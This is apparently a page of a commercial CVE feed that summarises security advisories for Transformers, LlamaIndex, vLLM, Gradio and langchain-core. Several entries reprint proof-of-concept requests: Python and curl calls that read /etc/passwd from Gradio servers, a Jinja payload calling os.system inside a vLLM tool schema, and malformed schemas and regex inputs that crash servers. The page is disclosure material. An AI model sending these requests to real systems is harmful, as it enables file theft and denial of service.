Threat Intelligence

Live CVE feed

299 threats tracked across 7 launch stacks — sourced from NVD, GHSA, CISA KEV, OSV, npm Audit, and EPSS.

60threats · Medium· page 2/3
Get guardrails →
2 rules

Transformers is vulnerable to ReDoS attack through its DonutProcessor class

A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in the Hugging Face Transformers library, specifically within the DonutProcessor class's token2json() method. This vulnerability affects versions 4.51.3 and earlier, and is fixed in version 4.52.1. The issue arises from the regex pattern <s_(.*?)> which can be exploited to cause excessive CPU consumption through crafted input strings due to catastrophic backtracking. This vulnerability can lead to service disruption, resource exhaustion, and potential API service vulnerabilities, impacting document processing tasks using the Donut model.

2 rules

LlamaIndex vulnerable to data loss through hash collisions in its DocugamiReader class

A vulnerability in the DocugamiReader class of the run-llama/llama_index repository, up to but excluding version 0.12.41, involves the use of MD5 hashing to generate IDs for document chunks. This approach leads to hash collisions when structurally distinct chunks contain identical text, resulting in one chunk overwriting another. This can cause loss of semantically or legally important document content, breakage of parent-child chunk hierarchies, and inaccurate or hallucinated responses in AI outputs. The issue is resolved in version 0.3.1.

2 rules

LlamaIndex vulnerable to DoS attack through uncontrolled recursive JSON parsing

The JSONReader in run-llama/llama_index versions 0.12.28 is vulnerable to a stack overflow due to uncontrolled recursive JSON parsing. This vulnerability allows attackers to trigger a Denial of Service (DoS) by submitting deeply nested JSON structures, leading to a RecursionError and crashing applications. The root cause is the unsafe recursive traversal design and lack of depth validation, which makes the JSONReader susceptible to stack overflow when processing deeply nested JSON. This impacts the availability of services, making them unreliable and disrupting workflows. The issue is resolved in version 0.12.38.

2 rules

Transformers vulnerable to ReDoS attack through its get_imports() function

A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in the Hugging Face Transformers library, specifically in the get_imports() function within dynamic_module_utils.py. This vulnerability affects versions 4.49.0 and is fixed in version 4.51.0. The issue arises from a regular expression pattern \stry\s:.?except.?: used to filter out try/except blocks from Python code, which can be exploited to cause excessive CPU consumption through crafted input strings due to catastrophic backtracking. This vulnerability can lead to remote code loading disruption, resource exhaustion in model serving, supply chain attack vectors, and development pipeline disruption.

2 rules

Transformers's ReDoS vulnerability in get_configuration_file can lead to catastrophic backtracking

A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in the Hugging Face Transformers library, specifically in the get_configuration_file() function within the transformers.configuration_utils module. The affected version is 4.49.0, and the issue is resolved in version 4.51.0. The vulnerability arises from the use of a regular expression pattern config\.(.*)\.json that can be exploited to cause excessive CPU consumption through crafted input strings, leading to catastrophic backtracking. This can result in model serving disruption, resource exhaustion, and increased latency in applications using the library.

Gradio Allows Unauthorized File Copy via Path Manipulation

An arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space. Description The flagging component doesn't properly validate file paths before copying files. Attackers can send specially crafted requests to the /gradio_api/run/predict endpoint to trigger these file copies. Source: User-controlled path parameter in the flagging functionality JSON payload Sink: shutil.copy operation in FileData._copy_to_dir() method The vulnerable code flow: 1. A JSON payload is sent to the /gradio_api/run/predict endpoint 2. The path field within FileData object can reference any file on the system 3. When processing this request, the Component.flag() method creates a GradioDataModel object 4. The FileData._copy_to_dir() method uses this path without proper validation: ``python def _copy_to_dir(self, dir: str) -> FileData: pathlib.Path(dir).mkdir(exist_ok=True) new_obj = dict(self) if not self.path: raise ValueError("Source file path is not set") new_name = shutil.copy(self.path, dir) # vulnerable sink new_obj["path"] = new_name return self.__class__(**new_obj) ` 5. The lack of validation allows copying any file the Gradio process can read PoC The following script demonstrates the vulnerability by copying /etc/passwd from the server to Gradio's flagged directory: Setup a Gradio app: `python import gradio as gr def image_classifier(inp): return {'cat': 0.2, 'dog': 0.8} test = gr.Interface(fn=image_classifier, inputs="image", outputs="label") test.launch(share=True) ` Run the PoC: `python import requests url = "https://[your-gradio-app-url]/gradio_api/run/predict" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" } payload = { "data": [ { "path": "/etc/passwd", "url": "[your-gradio-app-url]", "orig_name": "network_config", "size": 5000, "mime_type": "text/plain", "meta": { "_type": "gradio.FileData" } }, {} ], "event_data": None, "fn_index": 4, "trigger_id": 11, "session_hash": "test123" } response = requests.post(url, headers=headers, json=payload) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") ``

OWASP A04OWASP LLM
Get guardrail →

vLLM Tool Schema allows DoS via Malformed pattern and type Fields

Summary The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Details The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error: RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing" The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors. For example, the following inputs will crash the worker: Unclosed {, [, or ( Closed:{} and [] Here are some of runtime errors on the crash depending on what gets injected: RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed. RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count. RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed. PoC Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for: POST /v1/chat/completions HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: Content-Type: application/json Content-Length: 579 Origin: Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers Connection: keep-alive { "model": "mistral-nemo-instruct", "messages": [{ "role": "user", "content": "crash via type" }], "tools": [ { "type": "function", "function": { "name": "crash01", "parameters": { "type": "object", "properties": { "a": { "type": "something" } } } } } ], "tool_choice": { "type": "function", "function": { "name": "crash01", "arguments": { "a": "test" } } }, "stream": false, "max_tokens": 1 } Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker. POST /v1/chat/completions HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: Content-Type: application/json Content-Length: 718 Origin: Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers Connection: keep-alive { "model": "mistral-nemo-instruct", "messages": [ { "role": "user", "content": "Crash via Pattern" } ], "tools": [ { "type": "function", "function": { "name": "crash02", "parameters": { "type": "object", "properties": { "a": { "type": "string", "pattern": "{{ __import__('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}" } } } } } ], "tool_choice": { "type": "function", "function": { "name": "crash02" } }, "stream": false, "max_tokens": 32, "temperature": 0.2, "top_p": 1, "n": 1 } Impact Backend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests. Fix https://github.com/vllm-project/vllm/pull/17623

OWASP A03LLM01 · Prompt InjectionOWASP LLM
Get guardrail →

vLLM allows clients to crash the openai server with invalid regex

Impact A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema. Issue with more details: https://github.com/vllm-project/vllm/issues/17313 Patches https://github.com/vllm-project/vllm/pull/17623

vLLM DOS: Remotely kill vllm over http with invalid JSON schema

Summary Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server Details The following API call (venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}' will provoke a Uncaught exceptions from xgrammer in ./lib64/python3.11/site-packages/xgrammar/compiler.py Issue with more information: https://github.com/vllm-project/vllm/issues/17248 PoC Make a call to vllm with invalid json_scema e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}} curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}' Impact vllm crashes example traceback `` ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last): ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core ERROR 03-26 17:25:01 [core.py:340] engine_core.run_busy_loop() ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop ERROR 03-26 17:25:01 [core.py:340] outputs = step_fn() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step ERROR 03-26 17:25:01 [core.py:340] scheduler_output = self.scheduler.schedule() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule ERROR 03-26 17:25:01 [core.py:340] if structured_output_req and structured_output_req.grammar: ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar ERROR 03-26 17:25:01 [core.py:340] completed = self._check_grammar_completion() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion ERROR 03-26 17:25:01 [core.py:340] self._grammar = self._grammar.result(timeout=0.0001) ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result ERROR 03-26 17:25:01 [core.py:340] return self.__get_result() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result ERROR 03-26 17:25:01 [core.py:340] raise self._exception ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run ERROR 03-26 17:25:01 [core.py:340] result = self.fn(self.args, self.kwargs) ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar ERROR 03-26 17:25:01 [core.py:340] ctx = self.compiler.compile_json_schema(grammar_spec, ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema ERROR 03-26 17:25:01 [core.py:340] self._handle.compile_json_schema( ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool ERROR 03-26 17:25:01 [core.py:340] ERROR 03-26 17:25:01 [core.py:340] CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue. `` Fix https://github.com/vllm-project/vllm/pull/17623

vLLM has a Weakness in MultiModalHasher Image Hashing Implementation

Summary In the file vllm/multimodal/hasher.py, the MultiModalHasher class has a security and data integrity issue in its image hashing method. Currently, it serializes PIL.Image.Image objects using only obj.tobytes(), which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks. Details Affected file: vllm/multimodal/hasher.py Affected method: MultiModalHasher.serialize_item https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35 Current behavior: For Image.Image instances, only obj.tobytes() is used for hashing. Problem description: obj.tobytes() does not include the image’s width, height, or mode metadata. Impact: Two images with the same pixel byte sequence but different sizes could be regarded as the same image by the cache and hashing system, which may result in: Incorrect cache hits, leading to abnormal responses Deliberate construction of images with different meanings but the same hash value Recommendation In the serialize_item method, serialization of Image.Image objects should include not only pixel data, but also all critical metadata—such as dimensions (size), color mode (mode), format, and especially the info dictionary. The info dictionary is particularly important in palette-based images (e.g., mode 'P'), where the palette itself is stored in info. Ignoring info can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage. Summary: Serializing only the raw pixel data is insecure. Always include all image metadata (size, mode, format, info) in the hash calculation to prevent collisions, especially in cases like palette-based images. Impact for other modalities For the influence of other modalities, since the video modality is transformed into a multi-dimensional array containing the length, width, time, etc. of the video, the same problem exists due to the incorrect sequence of numpy as well. For audio, since the momo function is not enabled in librosa.load, the loaded audio is automatically encoded into single channels by librosa and returns a one-dimensional array of numpy, thus keeping the structure of numpy fixed and not affected by this issue. Fixes https://github.com/vllm-project/vllm/pull/17378

vLLM has a Regular Expression Denial of Service (ReDoS, Exponential Complexity) Vulnerability in `pythonic_tool_parser.py`

Summary A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable. Details The following regular expression is used to match tool/function call patterns: `` r"\[([a-zA-Z]+\w\(([a-zA-Z]+\w=.,\s)([a-zA-Z]+\w=.\s)?\),\s)([a-zA-Z]+\w\(([a-zA-Z]+\w=.,\s)([a-zA-Z]+\w=.\s)?\)\s)+\]" ` This pattern contains multiple nested quantifiers (, +), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking. Attack Example: A malicious input such as ` [A(A= )A(A=, )A(A=, )A(A=, )... (repeated dozens of times) ...] or "[A(A=" + "\t)A(A=,\t" repeat ` can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS). Proof of Concept: A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt. ` Length: 22, Time: 0.0000 seconds, Match: False Length: 38, Time: 0.0010 seconds, Match: False Length: 54, Time: 0.0250 seconds, Match: False Length: 70, Time: 0.5185 seconds, Match: False Length: 86, Time: 13.2703 seconds, Match: False Length: 102, Time: 319.0717 seconds, Match: False `` Impact Denial of Service (DoS): An attacker can trigger a denial of service by sending specially crafted payloads to any API or interface that invokes this regex, causing excessive CPU usage and making the vLLM service unavailable. Resource Exhaustion and Memory Retention: As this regex is invoked during function call parsing, the matching process may hold on to significant CPU and memory resources for extended periods (due to catastrophic backtracking). In the context of vLLM, this also means that the associated KV cache (used for model inference and typically stored in GPU memory) is not released in a timely manner. This can lead to GPU memory exhaustion, degraded throughput, and service instability. Potential for Broader System Instability: Resource exhaustion from stuck or slow requests may cascade into broader system instability or service downtime if not mitigated. Fix https://github.com/vllm-project/vllm/pull/18454 Note that while this change has significantly improved performance, this regex may still be problematic. It has gone from exponential time complexity, O(2^N), to O(N^2).

phi4mm: Quadratic Time Complexity in Input Token Processing​ leads to denial of service

Summary A critical performance vulnerability has been identified in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to ​​inefficient list concatenation operations​​, the algorithm exhibits ​​quadratic time complexity (O(n²))​​, allowing malicious actors to trigger resource exhaustion via specially crafted inputs. Details ​​Affected Component​​: input_processor_for_phi4mm function. https://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197 The code modifies the input_ids list in-place using input_ids = input_ids[:i] + tokens + input_ids[i+1:]. Each concatenation operation copies the entire list, leading to O(n) operations per replacement. For k placeholders expanding to m tokens, total time becomes O(kmn), approximating O(n²) in worst-case scenarios. PoC Test data demonstrates exponential time growth: ``python test_cases = [100, 200, 400, 800, 1600, 3200, 6400] run_times = [0.002, 0.007, 0.028, 0.136, 0.616, 2.707, 11.854] # seconds ` Doubling input size increases runtime by ~4x (consistent with O(n²)). Impact ​​Denial-of-Service (DoS):​​ An attacker could submit inputs with many placeholders (e.g., 10,000 <|audio_1|> tokens), causing CPU/memory exhaustion. Example: 10,000 placeholders → ~100 million operations. Remediation Recommendations​ Precompute all placeholder positions and expansion lengths upfront. Replace dynamic list concatenation with a single preallocated array. `python Pseudocode for O(n) solution new_input_ids = [] for token in input_ids: if token is placeholder: new_input_ids.extend([token] * precomputed_length) else: new_input_ids.append(token) ``

2 rules

Transformers Regular Expression Denial of Service (ReDoS) vulnerability

A Regular Expression Denial of Service (ReDoS) vulnerability was identified in the huggingface/transformers library, specifically in the file tokenization_gpt_neox_japanese.py of the GPT-NeoX-Japanese model. The vulnerability occurs in the SubWordJapaneseTokenizer class, where regular expressions process specially crafted inputs. The issue stems from a regex exhibiting exponential complexity under certain conditions, leading to excessive backtracking. This can result in high CPU usage and potential application downtime, effectively creating a Denial of Service (DoS) scenario. The affected version is v4.48.1 (latest).

2 rules

Gradio Vulnerable to Open Redirect

An open redirect vulnerability exists in the latest version of gradio-app/gradio. The vulnerability allows an attacker to redirect users to a malicious website by URL encoding. This can be exploited by sending a crafted request to the application, which results in a 302 redirect to an attacker-controlled site.

LlamaIndex Uncontrolled Resource Consumption vulnerability

A vulnerability in the KnowledgeBaseWebReader class of the run-llama/llama_index repository, version latest, allows an attacker to cause a Denial of Service (DoS) by controlling a URL variable to contain the root URL. This leads to infinite recursive calls to the get_article_urls method, exhausting system resources and potentially crashing the application.

OWASP A06LLM04 · Model DoSOWASP LLM
Get guardrail →

Gradio Path Traversal vulnerability

A vulnerability in the gradio-app/gradio repository, version git 67e4044, allows for path traversal on Windows OS. The implementation of the blocked_path functionality, which is intended to disallow users from reading certain files, is flawed. Specifically, while the application correctly blocks access to paths like 'C:/tmp/secret.txt', it fails to block access when using NTFS Alternate Data Streams (ADS) syntax, such as 'C:/tmp/secret.txt::$DATA'. This flaw can lead to unauthorized reading of blocked file paths.

OWASP A01OWASP LLM
Get guardrail →

langchain-core allows unauthorized users to read arbitrary files from the host file system

A vulnerability in langchain-core versions >=0.1.17,<0.1.53, >=0.2.0,<0.2.43, and >=0.3.0,<0.3.15 allows unauthorized users to read arbitrary files from the host file system. The issue arises from the ability to create langchain_core.prompts.ImagePromptTemplate's (and by extension langchain_core.prompts.ChatPromptTemplate's) with input variables that can read any user-specified path from the server file system. If the outputs of these prompt templates are exposed to the user, either directly or through downstream model outputs, it can lead to the exposure of sensitive information.

vLLM denial of service via outlines unbounded cache on disk

Impact The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. vLLM should have this off by default and allow administrators to opt-in due to the potential for abuse. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies to the V0 engine only. The V1 engine is not affected. Patches https://github.com/vllm-project/vllm/pull/14837 The fix is to disable this cache by default since it does not provide an option to limit its size. If you want to use this cache anyway, you may set the VLLM_V0_USE_OUTLINES_CACHE environment variable to 1. Workarounds There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server. References

Gradio vulnerable to arbitrary file read with File and UploadButton components

Summary If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. Details Consider the following application where a user can upload a file and preview its content: `` import gradio as gr def greet(value: bytes): return str(value) demo = gr.Interface(fn=greet, inputs=gr.File(type="binary"), outputs="textbox") if __name__ == "__main__": demo.launch() ` If we run this application and make the following request (which attempts to read the /etc/passwd file) ` curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain","meta":{"_type":"gradio.FileData"}}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}' ` Then this results in the following error on the server ` gradio.exceptions.InvalidPathError: Cannot move /etc/passwd to the gradio cache dir because it was not uploaded by a user. ` This is expected. However, if we now remove the "meta":{"_type":"gradio.FileData"} from the request: ` curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain"}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}' ` This doesn't cause an error and results in the content of /etc/passwd being shown in the response! This works because Gradio relies on the processing_utils.async_move_files_to_cache to sanitize all incoming file paths in all inputs. This function performs the following operation ` return await client_utils.async_traverse( data, _move_to_cache, client_utils.is_file_obj_with_meta ) ` where client_utils.is_file_obj_with_meta is used as a filter which tells on which inputs to perform the _move_to_cache function (which also performs the allowed/disallowed check on the file path). The problem is that client_utils.is_file_obj_with_meta is not guaranteed to trigger for every input that contains a file path: ` def is_file_obj_with_meta(d) -> bool: """ Check if the given value is a valid FileData object dictionary in newer versions of Gradio where the file objects include a specific "meta" key, e.g. { "path": "path/to/file", "meta": {"_type: "gradio.FileData"} } """ return ( isinstance(d, dict) and "path" in d and isinstance(d["path"], str) and "meta" in d and d["meta"].get("_type", "") == "gradio.FileData" ) ` For example, as in the PoC, the file path won't be checked if the meta key is not present in the request or if _type is not gradio.FileData. Then, the path remains under control of the attacker and is used to read a file in _process_single_file function in file.py and upload_button.py (and possibly other places) PoC As described above, run the following Gradio app ` import gradio as gr def greet(value: bytes): return str(value) demo = gr.Interface(fn=greet, inputs=gr.File(type="binary"), outputs="textbox") if __name__ == "__main__": demo.launch() ` And make the following request ` curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain"}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}' `` Impact Arbitrary file read in specific Gradio applications that use File or UploadButton components to upload files and echo/preview the content to the user.

OWASP A01LLM02 · Insecure OutputOWASP LLM
Get guardrail →

gradio Server Side Request Forgery vulnerability

In gradio <=4.42.0, the gr.DownloadButton function has a hidden server-side request forgery (SSRF) vulnerability. The reason is that within the save_url_to_cache function, there are no restrictions on the URL, which allows access to local target resources. This can lead to the download of local resources and sensitive information.

OWASP A10LLM02 · Insecure OutputOWASP LLM
Get guardrail →

Showing 2140 of 60 threats